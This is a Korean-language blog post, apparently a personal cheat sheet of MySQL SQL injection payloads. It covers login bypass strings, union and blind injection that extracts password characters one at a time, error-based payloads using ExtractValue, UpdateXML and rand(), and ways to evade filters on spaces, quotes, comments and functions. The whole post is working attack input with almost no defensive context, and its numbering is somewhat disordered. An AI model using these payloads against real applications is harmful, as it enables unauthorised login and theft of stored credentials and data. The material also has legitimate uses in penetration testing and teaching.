1. ?bid=if(1=1,52,2)
: select bid from board where bid=if(1=1,52,2);
2. ?bid=if((1)like(1),1,2)#
: select if((1)like(1),1,2);
: select instr(1,1);
3. ?bid=52 or bid=if((select(ascii(substr((select(bid)from(board)where(bid)like(52)),1,1))))=1,52,0)
4. ?bid=52 union select (1)#
: select bid from board where bid=52 union select (1);
5. ?bid=52 union select (version())#
: select bid from board where bid=52 union select (version());
6. between
: SELECT * FROM contacts WHERE contact_id BETWEEN 100 AND 200;
SELECT * FROM contacts WHERE contact_id >= 100 AND contact_id <= 200;
7. ?bid=52 and select(substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 'a')#
: select bid from board where bid=52 and substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 'a';
8. ?bid=52 and select(ascii(substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 50)#
: select bid from board where bid=52 and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1 ) > 50;
9. ?bid=52 div 52;
: select bid from board where bid=52 div 52#
: select 52 div 1;
11. ?bid=52 or concat('t','e','s','t')='test'#
: select concat('t','e','s','t')='test';
12. ?bid=52 and bid=select(mid('abcde',52,0)='abc')# --> ?bid=if((mid(pw,1,3))='abc',52,0)#
: select mid('abcde',1,3);
: select left('abcde',3);
: select right('abcde',3);
13. ?bid=(select(if(1)in(1),1,2))
14. PHP preg_match 공백우회
- tab : %09 / LineFeed (\n) : %0a / Carrage Return(wr) : %0d
- 주석 : /**/ 괄호 : () / 더하기 : +
15. 공백우회 : %09, %0a, %0b, %0c, %0d, %a0, /**/
Tab : %09 : no=1%09or%09id='admin'
Line Feed (\n): %0a : no=1%0aor%0aid='admin'
Carrage Return(\r) : %0d -> no=1%0dor%0did='admin'
주석 : /**/ -> no=1/**/or/**/id='admin'
괄호 : () -> no=(1)or(id='admin')
더하기 : + -> no=1+or+id='admin'
null : %00
16. #, -- 우회 : ;%00, /*
17. 싱글쿼터 우회
- 2진법, 16진법 select x'61' = 'a' / select 0x'61' = 'a'
- 36진법 : select conv(10,10,36) = 'A'
18. auto type cast
- false = 0
- true = 1
- true+true = 2
- floor(version()) = 5
19. substr( -> subtring(
- substr('test' from 1 for 1)='a''
20. like query
- select id from member where id like 'a%'
- select id from member where id like 'b%'
- select id from member where id like 'c%'
- select id from member where id like 'ca%'
- select id from member where id like 'cb%'
- select id from member where id like 'cc%'
21. filtering
- select mid('asd',1,1) = 'a'
- select lpad('asd',1,space(1)) = 'a'
- select rpad('asd',1,space(1)) = 'a'
- select reverse(right(reverse('asd'),1)) = 'a'
- select insert(insert('asd',1,0,space(0)),2,222,space(0)) = 'a'
- select right(left('asd',1),1) = 'a'
- select right(left('asd',2),1) = 's'
- select right(left('asd',3),1) = 'd'
22. if : case(), ifnull(), nullif()
23. concat : select 'a' 's' 'd' 'f'='asdf'
24. sleep -> select benchmark(1000000,MD5(CHAR(118)))
25. Magic Quota 우회
- Magic Quota는 GET, POST, COOKIE에만 적용됨
- insert into uploadfile vaules('filename', 'path') -> fdsa'),(user(),'1234'),('asdf
-> insert into uploadfile values('asdf','fdsa'),(version(), '1234'),('asdf','path')
26. Error Based SQL Injection (키값을 여러개로 주고 에러 발생 유도)
- select sum(5),concat(version(),floor(rand(0)*2))as a from information_schema.tables group by a;
- select * from (select name_const(version(),1),name_const(version(),1))a
- select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))
- select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)
- select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)
- if+union select 에러
- select * from table where 1 and if(1=2,1,(select 1 union select 2))
27. 실행중인 쿼리 목록 : select * from information_schema.processlist; -> 쿼리 구조 파악가능;
29. lpad 내용 추가
30. Limit 우회
- max, min, group_concat
31. union, group by, order by (error base)
select * from user where num=-1 order by 2;
select * from user where num=1 order by 3;
select * from user where num=1 group by 3;
select * from user where num=-1 union select 1,2,3;
32. substr 우회 : mid, right(left), substring
33. ascii 우회 : ord, hex
select ord('test'); -> 116 -> t
select ord(mid('test',2,1));
32. Attack Example
- Auth Injection : ?id=admin' or '1'='1# / ?id=admin or 1=1# / ?id=admin and 1=1# / ?id=admin' or 1# / ?id=admin' or 1-- / ' or 1#
- Union Injection : ?id=56 union select 1,1,1,version()#
- Blind Injection
?id=apple and ascii(substr(pw,1,1))='a'#
?id=if(1=1,1,0) / ?id=admin and length(pw)=5#
?id=admin' and substr(pw,1,1)='a' or id='garbage
?id=admin' and ascii(substr(pw,1,1))<65 / ?id=admin' and ascii(substr(pw,1,1))LIKE(65)
?id=admin' and ascii(substr(pw,1,1))IN(65) / ?bid=if((mid(pw,1,3))='abc',52,0)#
?id=guest' and 1=if(ascii(substr(select(table_name)from(information_schema.tables)limit(0,1))))=1,1,0) or '1'='0
?id=guest' and substr(pw,1,1)='a' or '1'='0
?id=guest' and length(pw)=5 or '1'='0 / ?id=guest' and if(length(pw)=5,sleep(4),0) or '1'='0
?id=guest' and ascii(mid(pw,1,1))=54 or '1'='1 / ?id=guest' and mid(pw,1,1)='a' or '1'='1
?id=1 and 1=(ascii(substr(pw,1,1)) between 100 and 100);
?id=1 and 1=if((ascii(substr(pw,1,1)) between 100 and 100)=1,1,0);
31. mysql information schema
- select(substr((select(max(table_name))from(information_schema.tables)where(TABLE_TYPE)=('BASE TABLE')),1,1));
'2. Information Security > 1. Insight' 카테고리의 다른 글
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5. Filtering 우회 (0) | 2020.02.05 |
4. SQL INJECTION CHEAT SHEET (SQL 인젝션 치트 시트) (0) | 2020.02.04 |
3. XSS (0) | 2020.01.13 |
1. PHP Security (0) | 2019.10.20 |